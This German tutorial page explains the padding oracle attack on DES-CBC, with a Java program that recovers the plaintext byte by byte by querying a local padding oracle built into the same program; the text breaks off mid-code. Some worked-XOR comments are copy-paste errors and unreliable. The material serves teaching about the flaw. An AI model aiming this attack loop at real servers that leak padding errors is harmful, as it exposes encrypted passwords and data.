Das folgende Beispiel hört sich verharmlosend „Padding Orakel“ an, ist allerdings eine Unsicherheit der bösesten Art und zeigt anschaulich, das „gut gedacht“ nicht immer „gut gemacht“ sein muss. Die gesamte Seite basiert auf einem Blog-Artikel in „SkullSecurity“ mit dem Namen „A padding oracle example“ oder auf gut Deutsch „Ein Padding Orakel-Beispiel“. Die Seite erreicht Ihr über den Weblink https://blog.skullsecurity.org/2013/a-padding-oracle-example und – falls die Seite nicht erreichbar sein sollte – über die von mir erstellte PDF-Sicherungskopie: G04_a_padding_oracle_example.
Ich versuche Euch jetzt, die Grundlagen in kurzer und knapper Form zu schildern. Auf der Seite A07 PKCS5 Padding habe ich Euch die Grundlagen des Paddings, also das Auffüllen von Zeichen auf eine definierte String- Länge, näher gebracht. Beim Padding Orakel wird dieses Vorgehen durch eine gezielte Manipulation der verschlüsselten Daten genutzt und wir (die bösen Angreifer) werden die unverschlüsselten Daten erhalten!
Was ist also unser Szenario? Es gibt eine Webseite mit einem Log-In und der Webserver ist selbstverständlich in der Lage, die verschlüsselt übertragenen Passwörter auf Richtigkeit zu überprüfen. Erst wenn das richtige Passwort eingegeben worden ist wird der geschützte Inhalt freigegeben. Leider ist der Webserver sehr „gut“ programmiert und der Programmierer hat sehr viel mehr preisgegeben als es notwendig war, denn er informiert den Benutzer über ein falsches Padding. Wir nutzen dieses gezielt aus und arbeiten uns Byte für Byte durch das verschlüsselte Passwort und Ende erhalten wir das unverschlüsselte Passwort, obwohl wir den verwendeten (geheimen) Schlüssel nicht kennen. Solltet Ihr jetzt denken „was für ein doofer Programmierer“ dann gebe ich Euch zu bedenken, das durch diesen Hack die Webserver von namhaften Firmen erfolgreich angegriffen wurden.
Noch ein Hinweis von meiner Seite: Für dieses Beispiel nutze ich die veraltete DES-Verschlüsselung (der Vorgänger der heute üblichen AES-Verschlüsselung), da der Artikel darauf aufbaut. Auch wenn DES heute grundsätzlich nicht mehr genutzt werden sollte, ist Vorgehensweise dennoch erschreckend – binnen weniger Sekunden erhalten wir das geheime Passwort (in unserem Beispiel „HelloWorld“).
Bitte wundert Euch nicht über den „umständlichen“ Quellcode, aber er ist sehr eng an die Vorlage den Blog-Autors angelehnt und soll Euch das Verständnis erleichtern. Solltet Ihr eigene Daten zum Test verwenden wollen, habe ich Euch ein kleines Setup-Programm erstellt, wo Ihr die eigenen Daten eingeben und mittels „copy & paste“ in dieses Programm kopieren könnt. Das Programm findet Ihr über diesen Link: G04a DES Padding Oracle Setup.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 |
package net.bplaced.javacrypto.unsecure; /* * Herkunft/Origin: http://javacrypto.bplaced.net/ * Programmierer/Programmer: Michael Fehr * Copyright/Copyright: frei verwendbares Programm (Public Domain) * Copyright: This is free and unencumbered software released into the public domain. * Lizenztext/Licence: <http://unlicense.org> * getestet mit/tested with: Java Runtime Environment 8 Update 191 x64 * getestet mit/tested with: Java Runtime Environment 11.0.1 x64 * Datum/Date (dd.mm.jjjj): 26.09.2019 * Projekt/Project: G04 DES Padding Orakel / G04 Padding Oracle * Funktion: zeigt die Unsicherheit durch das Padding Orakel * Function: shows the unsecurement through the padding oracle * * Sicherheitshinweis/Security notice * Die Programmroutinen dienen nur der Darstellung und haben keinen Anspruch auf eine korrekte Funktion, * insbesondere mit Blick auf die Sicherheit ! * Prüfen Sie die Sicherheit bevor das Programm in der echten Welt eingesetzt wird. * The program routines just show the function but please be aware of the security part - * check yourself before using in the real world ! * * Das Projekt basiert auf dem nachfolgenden Artikel: * The project is based on this article: * https://blog.skullsecurity.org/2013/a-padding-oracle-example * */ //diese routine hält sich eng an die vorlage und jedes byte wird einzeln bearbeitet //zuerst wird c2 bearbeitet (und damit p2), dann kommt c1 (p1) import java.security.InvalidAlgorithmParameterException; import java.security.InvalidKeyException; import java.security.NoSuchAlgorithmException; import java.util.Arrays; import javax.crypto.BadPaddingException; import javax.crypto.Cipher; import javax.crypto.IllegalBlockSizeException; import javax.crypto.NoSuchPaddingException; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; // basierend auf https://blog.skullsecurity.org/2013/a-padding-oracle-example // diese routine hält sich eng an die vorlage und jedes byte wird einzeln bearbeitet // zuerst wird c2 bearbeitet (und damit p2), dann kommt c1 (p1) public class G04b_DesPaddingOracle { public static void main(String[] args) throws Exception { System.out.println("G04b DES Padding Oracle"); /* * The setup As an example, let's assume we're using DES, since it has nice * short block sizes. We'll use the following variables: P = Plaintext (with the * padding added) Pn = The nth block of plaintext N = The number of blocks of * either plaintext or ciphertext (the number is the same) IV = Initialization * vector E() = Encrypt, using a given key (we don't notate the key for reasons * of simplicity) D() = Decrypt, using the same key as E() C = Ciphertext Cn = * The nth block of ciphertext * * We use the following values for the variables: P = * "Hello World\x05\x05\x05\x05\x05" P1 = "Hello Wo" P2 = * "rld\x05\x05\x05\x05\x05" N = 2 IV = "\x00\x00\x00\x00\x00\x00\x00\x00" E() = * des-cbc with the key "mydeskey" D() = des-cbc with the key "mydeskey" C = * "\x83\xe1\x0d\x51\xe6\xd1\x22\xca\x3f\xaf\x08\x9c\x7a\x92\x4a\x7b" C1 = * "\x83\xe1\x0d\x51\xe6\xd1\x22\xca" C2 = "\x3f\xaf\x08\x9c\x7a\x92\x4a\x7b" * * For what it's worth, I generated the ciphertext like this: irb(main):001:0>; * require 'openssl' irb(main):002:0>; c = * OpenSSL::Cipher::Cipher.new('des-cbc') irb(main):003:0>; c.encrypt * irb(main):004:0>; c.key = "mydeskey" irb(main):005:0>; c.iv = * "\x00\x00\x00\x00\x00\x00\x00\x00" irb(main):006:0>; data = * c.update("Hello World") + c.final irb(main):007:0>; data.unpack("H*") => * ["83e10d51e6d122ca3faf089c7a924a7b"] * */ // ausgabe der zwischenwerte Boolean out1Bool = false; // true = ausgabe, false = keine ausgabe // ausgabe der ergebnisse Boolean out2Bool = false; // true = ausgabe, false = keine ausgabe System.out.println(); System.out.println("= = = Erstellung bzw. Übernahme der Variablen = = ="); // übernahme der variablen aus desPaddingOracleSetup byte[] IV = decodeHexString("0000000000000000"); byte[] C = decodeHexString("83E10D51E6D122CA3FAF089C7A924A7B"); byte[] C1 = new byte[8]; C1 = Arrays.copyOfRange(C, 0, 8); byte[] C2 = new byte[8]; C2 = Arrays.copyOfRange(C, 8, 16); byte[] D = new byte[16]; // nimmt später die kompletten entschlüsselten daten auf // ausgabe System.out.println("Var IV [Länge:" + IV.length + " Byte] :" + printByteArray(IV, 9)); System.out.println("Var C [Länge:" + C.length + " Byte]:" + printByteArray(C, 17)); System.out.println("Var C1 [Länge:" + C1.length + " Byte] :" + printByteArray(C1, 9)); System.out.println("Var C2 [Länge:" + C2.length + " Byte] :" + printByteArray(C2, 9)); System.out.println("= = = Erstellung der Variablen abgeschlossen = = ="); System.out.println(); System.out.println("= = = Test des desPaddingOracles mit Block C2 = = ="); // test des oracles mit werten boolean desOracle; // sollte true ergeben desOracle = desCbcPaddingOracle(IV, C); System.out.println("desPaddingOracle mit Eingabe:" + printByteArray(C, 17) + ":" + desOracle); byte[] Cmodifiziert = new byte[16]; Cmodifiziert = C; Cmodifiziert[15] = (byte) 0x7a; desOracle = desCbcPaddingOracle(IV, Cmodifiziert); System.out.println("desPaddingOracle mit Eingabe:" + printByteArray(Cmodifiziert, 17) + ":" + desOracle); System.out.println("= = = Test des desPaddingOracles abgeschlossen = = ="); System.out.println(); System.out.println("= = = Erstellung einer neuen Eingabezeile für das desPaddingOracle = = ="); // erstellung einer neuen variablen zum brechen des codes byte[] Cb1 = new byte[] { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00 }; System.out.println("Variable Cb1 [Länge:" + Cb1.length + " Byte] :" + printByteArray(Cb1, 9)); System.out.println("Variable C2 [Länge:" + C2.length + " Byte] :" + printByteArray(C2, 9)); // verknüpfung der neuen variable mit Block 2 = C2 byte[] Cb2 = new byte[16]; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); System.out.println("Variable Cb2 [Länge:" + Cb2.length + " Byte]:" + printByteArray(Cb2, 17)); // test des oracles desOracle = desCbcPaddingOracle(IV, Cb2); System.out.println("desPaddingOracle mit Eingabe:" + printByteArray(Cb2, 17) + ":" + desOracle); System.out.println("= = = Test der Modifikation am desPaddingOracle abgeschlossen = = ="); // ======================== Block 1 Anfang ================================= System.out.println(); System.out.println( "= = = Durchprobieren der Modifikation am desPaddingOracle mit unterschiedlichen Werten = = ="); // wir verändern nun das letzte byte von cb1, verknüpfen die beiden byte arrays System.out.println("Cb1 Schleife :" + printByteArray(Cb1, 17)); System.out.println("C2 Original :" + printByteArray(C2, 17)); System.out.println("Cb2 Cb1 + C2 :" + printByteArray(Cb2, 17)); // Cb1 und C2 und testen am desPaddingOracle System.out.println("= Byte 08 mit Padding x01 ="); byte iGesichert = 0; // nimmt das gesuchte i auf, da i nach dem Ende der Schleife nicht mehr // verfügbar ist // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(8 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 08 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println("Der gesuchte Wert von Cb1[8] ist:" + iGesichert + "(byte) Hex:x" + String.format("%02X", iGesichert)); } /* * // ein bischen xor mathematik: P′2[8] = P2[8] ⊕ C1[8] ⊕ C′[8] (re-arrange * using XOR's commutative property): P2[8] = P′2[8] ⊕ C1[8] ⊕ C′[8] P2[8] = * 0x01 ⊕ 0xca ⊕ 0xce P2[8] = 5 */ // folgende formel ergibt sich // die zahl hinter (byte) = 1 ist das padding bei einer paddinglänge von 1 // C1[7] ist das 8. byte unseres original C1 byte arrays // Cb1[7] ist das 8. byte des ersten (modifizierten) blocks des Cb1 arrays byte P208 = (byte) ((byte) (1) ^ C1[8 - 1] ^ Cb1[8 - 1]); if (out2Bool == true) { System.out .println("Der gesuchte Wert von P2[8] ist:" + P208 + "(byte) Hex:x" + String.format("%02X", P208)); } // mathematik byte[] P2t = new byte[8]; P2t[8 - 1] = P208; System.out.println("Treffer für Cb1[8]:x" + String.format("%02X", iGesichert) + " Berechnung P2[8]:x" + String.format("%02X", P208) + " = P'2[8]=:x01" + " ^ C1[8]=:x" + String.format("%02X", (C1[8 - 1])) + " ^ C'[8]=:x" + String.format("%02X", (Cb1[8 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 07 mit Padding x02 ="); // nun tuen wir so als gäbe es ein zweier-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x02 ⊕ 0x05 ⊕ 0xca C′[8] = 0xcd */ Cb1[8 - 1] = (byte) ((byte) (2) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(7 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 07 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P207 = (byte) ((byte) (2) ^ C1[7 - 1] ^ Cb1[7 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[7] ist:" + P207 + " Hex:x" + String.format("%02X", P207)); } // mathematik P2t[7 - 1] = P207; System.out.println("Treffer für Cb1[7]:x" + String.format("%02X", iGesichert) + " Berechnung P2[7]:x" + String.format("%02X", P207) + " = P'2[7]=:x02" + " ^ C1[7]=:x" + String.format("%02X", (C1[7 - 1])) + " ^ C'[7]=:x" + String.format("%02X", (Cb1[7 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 06 mit Padding x03 ="); // nun tuen wir so als gäbe es ein dreier-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x03 ⊕ 0x05 ⊕ 0xca C′[8] = 0xcc * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x03 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x24 */ Cb1[8 - 1] = (byte) ((byte) (3) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (3) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(6 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 06 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P206 = (byte) ((byte) (3) ^ C1[6 - 1] ^ Cb1[6 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[6] ist:" + P206 + " Hex:x" + String.format("%02X", P206)); } // mathematik P2t[6 - 1] = P206; System.out.println("Treffer für Cb1[6]:x" + String.format("%02X", iGesichert) + " Berechnung P2[6]:x" + String.format("%02X", P206) + " = P'2[6]=:x03" + " ^ C1[6]=:x" + String.format("%02X", (C1[6 - 1])) + " ^ C'[6]=:x" + String.format("%02X", (Cb1[6 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 05 mit Padding x04 ="); // nun tuen wir so als gäbe es ein vierer-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x04 ⊕ 0x05 ⊕ 0xca C′[8] = 0xcb * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x04 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x23 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x04 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd0 */ Cb1[8 - 1] = (byte) ((byte) (4) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (4) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (4) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(5 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); if (out1Bool == true) { System.out.println("Cb2 Byte 05 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } desOracle = desCbcPaddingOracle(IV, Cb2); if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P205 = (byte) ((byte) (4) ^ C1[5 - 1] ^ Cb1[5 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[5] ist:" + P205 + " Hex:x" + String.format("%02X", P205)); } // mathematik P2t[5 - 1] = P205; System.out.println("Treffer für Cb1[5]:x" + String.format("%02X", iGesichert) + " Berechnung P2[5]:x" + String.format("%02X", P205) + " = P'2[5]=:x04" + " ^ C1[5]=:x" + String.format("%02X", (C1[5 - 1])) + " ^ C'[5]=:x" + String.format("%02X", (Cb1[5 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 04 mit Padding x05 ="); // nun tuen wir so als gäbe es ein fünfer-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x05 ⊕ 0x05 ⊕ 0xca C′[8] = 0xca * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x05 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x22 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x05 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd1 * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x05 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xe6 */ Cb1[8 - 1] = (byte) ((byte) (5) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (5) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (5) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (5) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(4 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 04 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P204 = (byte) ((byte) (5) ^ C1[4 - 1] ^ Cb1[4 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[4] ist:" + P204 + " Hex:x" + String.format("%02X", P204)); } // mathematik P2t[4 - 1] = P204; System.out.println("Treffer für Cb1[4]:x" + String.format("%02X", iGesichert) + " Berechnung P2[4]:x" + String.format("%02X", P204) + " = P'2[4]=:x05" + " ^ C1[4]=:x" + String.format("%02X", (C1[4 - 1])) + " ^ C'[4]=:x" + String.format("%02X", (Cb1[4 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 03 mit Padding x06 ="); // nun tuen wir so als gäbe es ein sechser-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x06 ⊕ 0x05 ⊕ 0xca C′[8] = 0xc9 * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x06 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x21 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x06 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd2 * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x06 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xe5 * * C′[4] = P′2[4] ⊕ P2[4] ⊕ C1[4] C′[4] = 0x06 ⊕ 0x05 ⊕ 0x51 C′[4] = 0x52 */ Cb1[8 - 1] = (byte) ((byte) (6) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (6) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (6) ^ (byte) (P206) ^ (byte) (C1[6 - 1])); Cb1[5 - 1] = (byte) ((byte) (6) ^ (byte) (P205) ^ (byte) (C1[5 - 1])); Cb1[4 - 1] = (byte) ((byte) (6) ^ (byte) (P204) ^ (byte) (C1[4 - 1])); if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[8-1] ist:" + Cb1[8 - 1] + " Hex:x" + String.format("%02X", Cb1[8 - 1])); System.out.println( "Der gesuchte Wert von Cb1[7-1] ist:" + Cb1[7 - 1] + " Hex:x" + String.format("%02X", Cb1[7 - 1])); System.out.println( "Der gesuchte Wert von Cb1[6-1] ist:" + Cb1[6 - 1] + " Hex:x" + String.format("%02X", Cb1[6 - 1])); System.out.println( "Der gesuchte Wert von Cb1[5-1] ist:" + Cb1[5 - 1] + " Hex:x" + String.format("%02X", Cb1[5 - 1])); System.out.println( "Der gesuchte Wert von Cb1[4-1] ist:" + Cb1[4 - 1] + " Hex:x" + String.format("%02X", Cb1[4 - 1])); } iGesichert = 0; // diese schleife probiert alle 256 bytes aus for (int i = 0; i < 256; i++) { Cb1[(3 - 1)] = (byte) i; System.arraycopy(Cb1, 0, Cb2, 0, Cb1.length); System.arraycopy(C2, 0, Cb2, Cb1.length, C2.length); desOracle = desCbcPaddingOracle(IV, Cb2); if (out1Bool == true) { System.out.println("Cb2 Byte 03 x01:" + printByteArray(Cb2, 17) + "Oracle:" + desOracle); } if (desOracle == true) { iGesichert = (byte) i; break; } } if (out2Bool == true) { System.out.println( "Der gesuchte Wert von Cb1[3-1] ist:" + iGesichert + " Hex:x" + String.format("%02X", iGesichert)); } byte P203 = (byte) ((byte) (6) ^ C1[3 - 1] ^ Cb1[3 - 1]); if (out2Bool == true) { System.out.println("Der gesuchte Wert von P2[3] ist:" + P203 + " Hex:x" + String.format("%02X", P203)); } // mathematik P2t[3 - 1] = P203; System.out.println("Treffer für Cb1[3]:x" + String.format("%02X", iGesichert) + " Berechnung P2[3]:x" + String.format("%02X", P203) + " = P'2[3]=:x06" + " ^ C1[3]=:x" + String.format("%02X", (C1[3 - 1])) + " ^ C'[3]=:x" + String.format("%02X", (Cb1[3 - 1])) + " P2:" + printByteArray(P2t, 17)); System.out.println("= Byte 02 mit Padding x07 ="); // nun tuen wir so als gäbe es ein siebener-padding /* * C′[8] = P′2[8] ⊕ P2[8] ⊕ C1[8] C′[8] = 0x07 ⊕ 0x05 ⊕ 0xca C′[8] = 0xc9 * * C′[7] = P′2[7] ⊕ P2[7] ⊕ C1[7] C′[7] = 0x07 ⊕ 0x05 ⊕ 0x22 C′[7] = 0x21 * * C′[6] = P′2[6] ⊕ P2[6] ⊕ C1[6] C′[6] = 0x07 ⊕ 0x05 ⊕ 0xd1 C′[6] = 0xd2 * * C′[5] = P′2[5] ⊕ P2[5] ⊕ C1[5] C′[5] = 0x07 ⊕ 0x05 ⊕ 0xe6 C′[5] = 0xe5 * * C′[4] = P′2[4] ⊕ P2[4] ⊕ C1[4] C′[4] = 0x07 ⊕ 0x05 ⊕ 0x51 C′[4] = 0x52 * * C′[3] = P′2[3] ⊕ P2[3] ⊕ C1[3] C′[3] = 0x07 ⊕ 0x64 ⊕ 0x0d C′[3] = 0x52 */ Cb1[8 - 1] = (byte) ((byte) (7) ^ (byte) (P208) ^ (byte) (C1[8 - 1])); Cb1[7 - 1] = (byte) ((byte) (7) ^ (byte) (P207) ^ (byte) (C1[7 - 1])); Cb1[6 - 1] = (byte) ((byte) (7) 